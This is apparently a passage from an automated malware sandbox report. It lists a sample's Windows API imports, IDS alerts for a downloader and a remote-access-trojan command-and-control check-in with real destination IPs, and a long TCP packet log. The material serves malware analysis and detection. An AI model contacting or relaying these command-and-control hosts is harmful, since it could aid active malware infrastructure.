MultiByteToWideChar, FindResourceW, LoadResource, LockResource, SizeofResource, ReadFile, CloseHandle, CreateProcessW, SetHandleInformation, GetConsoleCP
USER32.dll	FrameRect, CopyIcon, ReuseDDElParam, UnpackDDElParam, InsertMenuItemW, TranslateAcceleratorW, ModifyMenuW, CharUpperBuffW, RegisterClipboardFormatW, LoadImageW, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, SetClassLongW, LockWindowUpdate, BringWindowToTop, SetParent, SetCursorPos, DestroyAcceleratorTable, CreateAcceleratorTableW, LoadAcceleratorsW, MapVirtualKeyW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, DrawIconEx, DrawFocusRect, DrawFrameControl, DrawEdge, MapDialogRect, SetWindowContextHelpId, SetRect, InvalidateRgn, CopyAcceleratorTableW, CharNextW, DestroyIcon, WaitMessage, CopyImage, MonitorFromPoint, UnionRect, EnableScrollBar, DestroyMenu, IsMenu, IsRectEmpty, SetMenuDefaultItem, GetMenuDefaultItem, GetMenuItemInfoW, CreatePopupMenu, NotifyWinEvent, OffsetRect, WindowFromPoint, MessageBeep, SetWindowRgn, DeleteMenu, GetSystemMenu, LoadMenuW, KillTimer, SetTimer, IsZoomed, TrackMouseEvent, IntersectRect, InflateRect, RealChildWindowFromPoint, SendDlgItemMessageA, UnregisterClassW, EnumDisplayMonitors, SetRectEmpty, CharUpperW, LoadCursorW, GetSysColorBrush, SetCursor, ShowOwnedPopups, TranslateMessage, GetMessageW, PostQuitMessage, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, CheckMenuItem, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, SetScrollInfo, GetTopWindow, GetClassLongW, EqualRect, CopyRect, MapWindowPoints, AdjustWindowRectEx, RemovePropW, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, GetForegroundWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, IsWindowVisible, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, IsChild, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, PeekMessageW, DispatchMessageW, IsDialogMessageW, GetWindow, SetWindowLongW, GetWindowTextLengthW, GetWindowTextW, SetWindowTextW, SetFocus, GetDlgCtrlID, CheckDlgButton, SetWindowPos, MoveWindow, ShowWindow, CallNextHookEx, SetWindowsHookExW, PtInRect, GetFocus, GetSysColor, ScreenToClient, ClientToScreen, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, TabbedTextOutW, GrayStringW, DrawTextExW, DrawTextW, GetWindowRgn, GetComboBoxInfo, DestroyCursor, InvertRect, HideCaret, CreateMenu, SubtractRect, GetUpdateRect, IsClipboardFormatAvailable, TranslateMDISysAccel, DefMDIChildProcW, GetLastActivePopup, GetWindowThreadProcessId, DefFrameProcW, DrawMenuBar, MapVirtualKeyExW, GetKeyNameTextW, IsCharLowerW, GetIconInfo, GetDoubleClickTime, GetNextDlgGroupItem, EnableMenuItem, PostThreadMessageW, GetWindowLongW, SetActiveWindow, IsWindowEnabled, GetActiveWindow, GetNextDlgTabItem, GetDlgItem, EndDialog, CreateDialogIndirectParamW, DestroyWindow, UnhookWindowsHookEx, GetClassNameW, FillRect, InvalidateRect, UpdateWindow, DrawStateW, GetDesktopWindow, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringW, PostMessageW, GetParent, GetAsyncKeyState, DrawIcon, GetClientRect, GetSystemMetrics, IsIconic, SetLayeredWindowAttributes, MessageBoxW, SendMessageTimeoutW, RegisterWindowMessageW, EnableWindow, IsWindow, ReleaseCapture, SetCapture, GetCursorPos, SetForegroundWindow, LoadBitmapW, SendMessageW, UpdateLayeredWindow, GetDC, GetWindowRect, LoadIconW, SystemParametersInfoW
GDI32.dll	SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateCompatibleBitmap, CreateDIBitmap, CreateFontIndirectW, CreateRectRgnIndirect, EnumFontFamiliesW, GetTextCharsetInfo, GetTextMetricsW, GetTextExtentPoint32W, CombineRgn, GetMapMode, PatBlt, SetRectRgn, DPtoLP, CreateRoundRectRgn, CreateDIBSection, GetBkColor, GetTextColor, GetRgnBox, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, RealizePalette, SetPixel, StretchBlt, SetDIBColorTable, OffsetRgn, Rectangle, SetViewportOrgEx, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, ExtFloodFill, SetPaletteEntries, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EnumFontFamiliesExW, SetPixelV, GetTextFaceW, SetTextAlign, SetTextColor, SetViewportExtEx, ExtTextOutW, TextOutW, MoveToEx, RoundRect, CreateCompatibleDC, SetROP2, SetPolyFillMode, GetLayout, SetLayout, SetMapMode, SetBkMode, SetBkColor, SelectPalette, ExtSelectClipRgn, SelectClipRgn, SaveDC, RestoreDC, RectVisible, PtVisible, LineTo, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetPixel, GetObjectType, GetClipBox, ExcludeClipRect, Escape, DeleteDC, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateBitmap, BitBlt, GetObjectW, GetStockObject, CreateSolidBrush, GetDeviceCaps, CreateDCW, CopyMetaFileW, DeleteObject, SelectObject
MSIMG32.dll	AlphaBlend, TransparentBlt
WINSPOOL.DRV	DocumentPropertiesW, ClosePrinter, OpenPrinterW
ADVAPI32.dll	RegSetValueExW, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegQueryValueExW, RegOpenKeyExW
SHELL32.dll	DragFinish, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHBrowseForFolderW, SHGetDesktopFolder, SHGetFileInfoW, ShellExecuteW, SHGetMalloc, DragQueryFileW, SHAppBarMessage
COMCTL32.dll	InitCommonControlsEx
SHLWAPI.dll	PathFileExistsW, PathFindExtensionW, PathFindFileNameW, PathIsUNCW, PathStripToRootW, StrFormatKBSizeW, PathRemoveFileSpecW
UxTheme.dll	OpenThemeData, IsAppThemed, DrawThemeParentBackground, DrawThemeText, GetThemePartSize, IsThemeBackgroundPartiallyTransparent, GetWindowTheme, GetThemeSysColor, GetCurrentThemeName, GetThemeColor, DrawThemeBackground, CloseThemeData
ole32.dll	OleInitialize, OleUninitialize, CoFreeUnusedLibraries, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, CreateILockBytesOnHGlobal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CreateStreamOnHGlobal, CoInitializeEx, CLSIDFromProgID, CoCreateInstance, CoGetObject, CoTaskMemAlloc, CoTaskMemFree, OleDuplicateData, ReleaseStgMedium, CoUninitialize, CoRegisterMessageFilter, CoRevokeClassObject, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, OleGetClipboard, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleLockRunning, CoCreateGuid, CoInitialize, CoDisconnectObject, CLSIDFromString
OLEAUT32.dll	SysAllocString, OleCreateFontIndirect, VarBstrFromDate, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElemsize, SafeArrayDestroy, SafeArrayCreate, VariantTimeToSystemTime, SystemTimeToVariantTime, SysStringLen, DispCallFunc, LoadRegTypeLib, VariantCopy, VariantChangeType, VariantClear, VariantInit, SysAllocStringLen, SysFreeString, LoadTypeLib
oledlg.dll	OleUIBusyW
gdiplus.dll	GdipDrawImageI, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageGraphicsContext, GdipDrawImageRectI, GdipSetInterpolationMode, GdipDeleteGraphics, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromStream, GdipCreateBitmapFromHBITMAP, GdipGetImageWidth, GdipGetImageHeight, GdipCreateHBITMAPFromBitmap, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage
dbghelp.dll	MiniDumpWriteDump
WS2_32.dll	shutdown, freeaddrinfo, closesocket, connect, socket, getaddrinfo, WSACleanup, WSAStartup
WININET.dll	HttpOpenRequestW, InternetSetStatusCallbackW, InternetGetLastResponseInfoW, InternetQueryDataAvailable, InternetWriteFile, InternetSetFilePointer, InternetReadFile, InternetConnectW, InternetCloseHandle, InternetOpenW, HttpSendRequestW, HttpQueryInfoW
OLEACC.dll	CreateStdAccessibleObject, AccessibleObjectFromWindow, LresultFromObject
IMM32.dll	ImmReleaseContext, ImmGetContext, ImmGetOpenStatus
WINMM.dll	PlaySoundW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-14T18:31:06.970884+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49737	172.67.203.195	80	TCP
2024-09-14T18:31:39.230500+0200	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	49740	45.201.245.153	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2024 18:31:06.089025021 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.094407082 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.094646931 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.094753027 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.100435972 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.970772982 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.970828056 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.970864058 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.970884085 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.970899105 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.970933914 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.970967054 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.970968008 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.970968962 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.970968008 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971004963 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.971023083 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971023083 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971040010 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.971055031 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971075058 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.971090078 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971110106 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.971144915 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.971148014 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971170902 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971206903 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.971268892 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.971329927 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.976165056 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.976254940 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.976283073 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.976345062 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.976403952 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.976464033 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.976778984 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.976845026 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.981093884 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.981128931 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.981206894 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.981244087 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.981271029 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.981338978 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.981714964 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.981777906 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.985847950 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.985882998 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.985933065 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.985970020 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.986578941 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.986625910 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.986649036 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.986658096 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.986685038 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.986711025 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.990720034 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.990756035 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.990809917 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.990907907 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.991375923 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.991425991 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.991456985 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.991491079 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.995549917 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.995584011 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.995630026 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.995675087 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.996102095 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.996135950 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:06.996166945 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:06.996198893 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.000315905 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.000350952 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.000384092 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.000405073 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.000447989 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.000936985 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.000972033 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.001013041 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.001040936 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.005074978 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.005109072 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.005152941 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.005187988 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.005633116 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.005666971 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.005706072 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.005737066 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.009828091 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.009862900 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.009893894 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.009911060 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.009937048 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.009967089 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.010402918 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.010443926 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.010462046 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.010499954 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.014605045 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.014637947 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.014667034 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.014693975 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.015142918 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.015177011 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.015196085 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.015229940 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.019434929 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.019468069 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.019712925 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.019714117 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.019927025 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.019961119 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.019993067 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.020124912 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.020124912 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.020124912 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.024142027 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.024175882 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.024235964 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.024235964 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.024667978 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.024701118 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.024746895 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.024746895 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.028908014 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.028944016 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.028973103 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.029009104 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.029587984 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.029625893 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.029649019 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.029659033 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.029676914 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.029716969 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.033670902 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.033706903 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.034254074 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.034356117 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.034393072 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.034604073 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.034604073 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.038480043 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.038515091 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.038710117 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.038710117 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.039027929 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.039079905 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.039186954 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.039187908 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.043268919 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.043303013 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.043335915 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.043364048 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.043365002 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.043476105 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.043873072 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.043905973 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.043939114 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.043973923 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.048017025 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.048051119 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.048269987 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.048594952 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.048629045 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.048697948 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.052788019 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.052822113 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.052853107 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.053014040 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.053014040 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.053369999 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.053412914 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.053483009 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.057780981 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.057815075 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.057889938 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.058362007 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.058397055 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.058430910 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.058466911 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.062551975 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.062587023 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.062658072 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.063210011 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.063244104 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.063276052 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.063311100 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.063345909 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.067326069 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.067359924 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.067538023 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.068047047 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.068080902 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.068274021 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.072165012 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.072199106 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.072293043 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.072788000 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.072841883 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.072874069 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.072912931 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.072942019 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.076971054 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.077012062 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.077083111 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.077557087 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.077593088 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.077656984 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.081804991 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.081840038 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.082216978 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.082420111 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.082453966 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.082487106 CEST	80	49737	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.082706928 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.082706928 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.258198977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.263317108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.263425112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.263653040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:07.268786907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.884438038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:07.887370110 CEST	49738	80	192.168.2.4	172.67.203.195
